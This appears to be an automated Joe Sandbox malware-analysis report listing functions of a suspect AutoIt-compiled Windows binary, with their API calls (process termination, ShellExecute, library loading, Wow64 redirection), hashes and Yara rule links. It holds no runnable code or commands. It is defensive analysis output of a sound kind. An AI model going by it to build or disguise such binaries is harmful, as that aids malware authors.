                          Function 00701BC3 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                          Download Yara Rule
                          APIs
                          • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00701BF4
                          • MapVirtualKeyW.USER32(00000010,00000000), ref: 00701BFC
                          • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00701C07
                          • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00701C12
                          • MapVirtualKeyW.USER32(00000011,00000000), ref: 00701C1A
                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00701C22
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Virtual
                          • String ID:
                          • API String ID: 4278518827-0
                          • Opcode ID: 9301c990123db78179f95062be692d60ff009cee9cea926f34246c0f0649664e
                          • Instruction ID: 0b6bea5549b196457eea7d0a2702b650a7444a64445dadfd7c2efb538c22d5a3
                          • Opcode Fuzzy Hash: 9301c990123db78179f95062be692d60ff009cee9cea926f34246c0f0649664e
                          • Instruction Fuzzy Hash: 280167B0902B5ABDE3008F6A8C85B52FFA8FF19354F00415BA15C4BA42C7F5A864CBE5
                          Function 0076EB20 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                          Download Yara Rule
                          APIs
                          • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0076EB30
                          • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0076EB46
                          • GetWindowThreadProcessId.USER32(?,?), ref: 0076EB55
                          • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0076EB64
                          • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0076EB6E
                          • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0076EB75
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                          • String ID:
                          • API String ID: 839392675-0
                          • Opcode ID: 0f5cf283fb1914b39d29c2cc53030dc2f7aab5c86700b6802ad45b9843cee111
                          • Instruction ID: 40295c9ec278f963dfeb74a33a8f884e5641ab3fb7ce65a8ebb8be3258b658cd
                          • Opcode Fuzzy Hash: 0f5cf283fb1914b39d29c2cc53030dc2f7aab5c86700b6802ad45b9843cee111
                          • Instruction Fuzzy Hash: A3F054B2140558BBEB2257529C0EEEF3E7CEFCAB11F00815AF601D1191D7A85A02C6BD
                          Function 00757439 Relevance: 9.0, APIs: 6, Instructions: 37windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetClientRect.USER32(?), ref: 00757452
                          • SendMessageW.USER32(?,00001328,00000000,?), ref: 00757469
                          • GetWindowDC.USER32(?), ref: 00757475
                          • GetPixel.GDI32(00000000,?,?), ref: 00757484
                          • ReleaseDC.USER32(?,00000000), ref: 00757496
                          • GetSysColor.USER32(00000005), ref: 007574B0
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: ClientColorMessagePixelRectReleaseSendWindow
                          • String ID:
                          • API String ID: 272304278-0
                          • Opcode ID: 07d9feae5ee18715a86383b64ddae2b38a9b392bb4a762882c1bf61a515c7310
                          • Instruction ID: cba0de6d39c14a81aef13f5ac336b4c2bcfbf66fca1a615e9843ecd1db40d3ac
                          • Opcode Fuzzy Hash: 07d9feae5ee18715a86383b64ddae2b38a9b392bb4a762882c1bf61a515c7310
                          • Instruction Fuzzy Hash: FC018B31400205EFDF125FA4EC08BEA7BB5FB04312F618061FD16A20A0CB391E52EB14
                          Function 00761874 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                          Download Yara Rule
                          APIs
                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0076187F
                          • UnloadUserProfile.USERENV(?,?), ref: 0076188B
                          • CloseHandle.KERNEL32(?), ref: 00761894
                          • CloseHandle.KERNEL32(?), ref: 0076189C
                          • GetProcessHeap.KERNEL32(00000000,?), ref: 007618A5
                          • HeapFree.KERNEL32(00000000), ref: 007618AC
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                          • String ID:
                          • API String ID: 146765662-0
                          • Opcode ID: 2e4bc78b6f149739e97d4387f7ba9f1379b43478f71a99704492785fdf2f4f07
                          • Instruction ID: 0692fca6edbaf5f2ea2c52ba089938dd66798c3a63175f5ecc3a994bb0d49766
                          • Opcode Fuzzy Hash: 2e4bc78b6f149739e97d4387f7ba9f1379b43478f71a99704492785fdf2f4f07
                          • Instruction Fuzzy Hash: 66E0E576044905BBDF025FA1EE0D90ABF39FF49B22B10C222F22581170CB369822DF69
                          Function 0070BBE0 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 232COMMON
                          Download Yara Rule
                          APIs
                          • __Init_thread_footer.LIBCMT ref: 0070BEB3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Init_thread_footer
                          • String ID: D%}$D%}$D%}$D%}D%}
                          • API String ID: 1385522511-1153134958
                          • Opcode ID: d308375ec324788d5974918b83c4de1ae3e6169980bb15091b65a13fcca90a61
                          • Instruction ID: 9a312cd0bea1436955fa6bc28194ba46ed948c3373ad3b2f5638721379daf9d8
                          • Opcode Fuzzy Hash: d308375ec324788d5974918b83c4de1ae3e6169980bb15091b65a13fcca90a61
                          • Instruction Fuzzy Hash: 20913075A00205DFCB14CF58C090AAAB7F1FF58314F24866ED545A7391E739EE92CBA0
                          Function 00787B7E Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 230COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00720242: EnterCriticalSection.KERNEL32(007D070C,007D1884,?,?,0071198B,007D2518,?,?,?,007012F9,00000000), ref: 0072024D
                            • Part of subcall function 00720242: LeaveCriticalSection.KERNEL32(007D070C,?,0071198B,007D2518,?,?,?,007012F9,00000000), ref: 0072028A
                            • Part of subcall function 00709CB3: _wcslen.LIBCMT ref: 00709CBD
                            • Part of subcall function 007200A3: __onexit.LIBCMT ref: 007200A9
                          • __Init_thread_footer.LIBCMT ref: 00787BFB
                            • Part of subcall function 007201F8: EnterCriticalSection.KERNEL32(007D070C,?,?,00718747,007D2514), ref: 00720202
                            • Part of subcall function 007201F8: LeaveCriticalSection.KERNEL32(007D070C,?,00718747,007D2514), ref: 00720235
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                          • String ID: +Tu$5$G$Variable must be of type 'Object'.
                          • API String ID: 535116098-335167736
                          • Opcode ID: a470c5829a32b918c7239afa55d4aa050e6aaceac83add1a9cece52ad5423a19
                          • Instruction ID: 9b2cbe70e27cdab42dfe82c8e4aed52e060b57e192105b53d4dd0caa576cab47
                          • Opcode Fuzzy Hash: a470c5829a32b918c7239afa55d4aa050e6aaceac83add1a9cece52ad5423a19
                          • Instruction Fuzzy Hash: A3918C70A44209EFCB18EF54D895DADB7B6FF44300F248059F806AB292DB79EE41DB61
                          Function 0076C5D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00707620: _wcslen.LIBCMT ref: 00707625
                          • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0076C6EE
                          • _wcslen.LIBCMT ref: 0076C735
                          • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0076C79C
                          • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0076C7CA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: ItemMenu$Info_wcslen$Default
                          • String ID: 0
                          • API String ID: 1227352736-4108050209
                          • Opcode ID: a7b69de47c96181c2757053a5be6489f6838f114b3feac879fc81e58209273e5
                          • Instruction ID: 59c685cf19b8ed2f30227f3e378eced7c909f096f313aac80d64473f7bd6e8c6
                          • Opcode Fuzzy Hash: a7b69de47c96181c2757053a5be6489f6838f114b3feac879fc81e58209273e5
                          • Instruction Fuzzy Hash: C151DF71604301ABD7129F28C889A7B77E8AF49310F040A2EFDD6D31D1DB6CE8049B56
                          Function 0078AD64 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON
                          Download Yara Rule
                          APIs
                          • ShellExecuteExW.SHELL32(0000003C), ref: 0078AEA3
                            • Part of subcall function 00707620: _wcslen.LIBCMT ref: 00707625
                          • GetProcessId.KERNEL32(00000000), ref: 0078AF38
                          • CloseHandle.KERNEL32(00000000), ref: 0078AF67
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: CloseExecuteHandleProcessShell_wcslen
                          • String ID: <$@
                          • API String ID: 146682121-1426351568
                          • Opcode ID: f1f0e26d62c52d078ff517d2d649d3fb645d606e3ab276367872501caeeca467
                          • Instruction ID: 5afe0dd66e83025001399675d725c297426ea8fa21088735584c7f18829085bf
                          • Opcode Fuzzy Hash: f1f0e26d62c52d078ff517d2d649d3fb645d606e3ab276367872501caeeca467
                          • Instruction Fuzzy Hash: 54717C71A00615EFDB14EF54C489A9EBBF0FF08314F04859AE816AB392CB78ED45CB91
                          Function 0076719E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00767206
                          • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0076723C
                          • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0076724D
                          • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 007672CF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: ErrorMode$AddressCreateInstanceProc
                          • String ID: DllGetClassObject
                          • API String ID: 753597075-1075368562
                          • Opcode ID: e0867ab4ead4522b4b1385ed5fdd7b34441f7a40902cca7d80c2e3d6f9b798d5
                          • Instruction ID: f399c186d8defa7456c82c5b9533c5a8d9e609e0afac075019d2bc69c8a6f100
                          • Opcode Fuzzy Hash: e0867ab4ead4522b4b1385ed5fdd7b34441f7a40902cca7d80c2e3d6f9b798d5
                          • Instruction Fuzzy Hash: 304171B1604204DFDB19CF54C894A9A7BB9FF44358F1480ADFD069F20AD7B8D945DBA0
                          Function 00793D7C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00793E35
                          • IsMenu.USER32(?), ref: 00793E4A
                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00793E92
                          • DrawMenuBar.USER32 ref: 00793EA5
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Menu$Item$DrawInfoInsert
                          • String ID: 0
                          • API String ID: 3076010158-4108050209
                          • Opcode ID: 6a67a10f9aaae9b719fce7f1a5e0950ad19d615b9b07ab07cd482a0d1a751109
                          • Instruction ID: 061278b8dc842480a3c901c7af5b68910cef03920d7d0ea621b1180ea54579c8
                          • Opcode Fuzzy Hash: 6a67a10f9aaae9b719fce7f1a5e0950ad19d615b9b07ab07cd482a0d1a751109
                          • Instruction Fuzzy Hash: 30414775A01209EFDF10DF60E884AAABBB9FF49354F04812AE915A7250D738AE55CF60
                          Function 00792F17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00792F8D
                          • LoadLibraryW.KERNEL32(?), ref: 00792F94
                          • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00792FA9
                          • DestroyWindow.USER32(?), ref: 00792FB1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: MessageSend$DestroyLibraryLoadWindow
                          • String ID: SysAnimate32
                          • API String ID: 3529120543-1011021900
                          • Opcode ID: 07ea52542ecd16366e8b693245a0d7a1583ac76e9adb867aedea80171f7f9c41
                          • Instruction ID: e45bcefe53b0b93e1a24a4ff56c02263f2d02853de0732165bfc7a3d70a69b33
                          • Opcode Fuzzy Hash: 07ea52542ecd16366e8b693245a0d7a1583ac76e9adb867aedea80171f7f9c41
                          • Instruction Fuzzy Hash: 2021DC72200205BBEF11AF64EC84EBB37BAEB59364F104619FA10D20A1C739DC529760
                          Function 00724D6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00724D1E,007328E9,?,00724CBE,007328E9,007C88B8,0000000C,00724E15,007328E9,00000002), ref: 00724D8D
                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00724DA0
                          • FreeLibrary.KERNEL32(00000000,?,?,?,00724D1E,007328E9,?,00724CBE,007328E9,007C88B8,0000000C,00724E15,007328E9,00000002,00000000), ref: 00724DC3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: AddressFreeHandleLibraryModuleProc
                          • String ID: CorExitProcess$mscoree.dll
                          • API String ID: 4061214504-1276376045
                          • Opcode ID: 1f715678d3a695519a48a5b1fa1e816c33a3cac547a9238715aea70777c166e8
                          • Instruction ID: 4714ab172d48202ce9e7916c5f8894fdef7fcdd5b8a92c7233ede26fc21afe29
                          • Opcode Fuzzy Hash: 1f715678d3a695519a48a5b1fa1e816c33a3cac547a9238715aea70777c166e8
                          • Instruction Fuzzy Hash: 56F0C230A40218FBDF129F90EC09BADBFB5EF44711F0041A9F909A2260CB385D41CBD8
                          Function 0075D3A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • LoadLibraryA.KERNEL32 ref: 0075D3AD
                          • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0075D3BF
                          • FreeLibrary.KERNEL32(00000000), ref: 0075D3E5
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Library$AddressFreeLoadProc
                          • String ID: GetSystemWow64DirectoryW$X64
                          • API String ID: 145871493-2590602151
                          • Opcode ID: 8fb525ce18f5eeffcb2682a3d02870af5f5510c9ecc66e88f9a92a46ea4fbc0d
                          • Instruction ID: de8912ead2b987508069be131d05be4e6d50c6533e9e31042ea03fe2b3f30d32
                          • Opcode Fuzzy Hash: 8fb525ce18f5eeffcb2682a3d02870af5f5510c9ecc66e88f9a92a46ea4fbc0d
                          • Instruction Fuzzy Hash: 6CF0E5B1546A21DBDB3267109C589E97325BF10703F94816AFC06E2154DBECCD8CCA9B
                          Function 00704E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00704EDD,?,007D1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00704E9C
                          • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00704EAE
                          • FreeLibrary.KERNEL32(00000000,?,?,00704EDD,?,007D1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00704EC0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Library$AddressFreeLoadProc
                          • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                          • API String ID: 145871493-3689287502
                          • Opcode ID: 618acca74e8412adc6cd57be64a554fe5bdb26cada00321f248fccaac7ba94e5
                          • Instruction ID: 90aa4b75424f817659626158c9a9da03629ae0b755cab093622809a9f8ad93a6
                          • Opcode Fuzzy Hash: 618acca74e8412adc6cd57be64a554fe5bdb26cada00321f248fccaac7ba94e5
                          • Instruction Fuzzy Hash: A1E0CDF5A415229BD6331725FC18B5F7694AF81F627054216FD04D3150DB6CCD0340EC
                          Function 00704E59 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00743CDE,?,007D1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00704E62
                          • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00704E74
                          • FreeLibrary.KERNEL32(00000000,?,?,00743CDE,?,007D1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00704E87
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Library$AddressFreeLoadProc
                          • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                          • API String ID: 145871493-1355242751
                          • Opcode ID: 07e5e1846551f768b259f5e91e55f756d7661e31200a68f09cb77e2f932ab04e
                          • Instruction ID: 811d7078318274e1d50dce03e914b3caa78dc1b69375c96fd1e8291ba2380e32
                          • Opcode Fuzzy Hash: 07e5e1846551f768b259f5e91e55f756d7661e31200a68f09cb77e2f932ab04e
                          • Instruction Fuzzy Hash: 58D0C2B154262197CE231B24BC08E8B2A58AF81B11305825ABA08A2190CF2CCD0281D8
                          Function 0078A387 Relevance: 7.8, APIs: 5, Instructions: 256COMMON
                          Download Yara Rule
                          APIs
                          • GetCurrentProcessId.KERNEL32 ref: 0078A427
                          • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0078A435
                          • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0078A468
                          • CloseHandle.KERNEL32(?), ref: 0078A63D
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
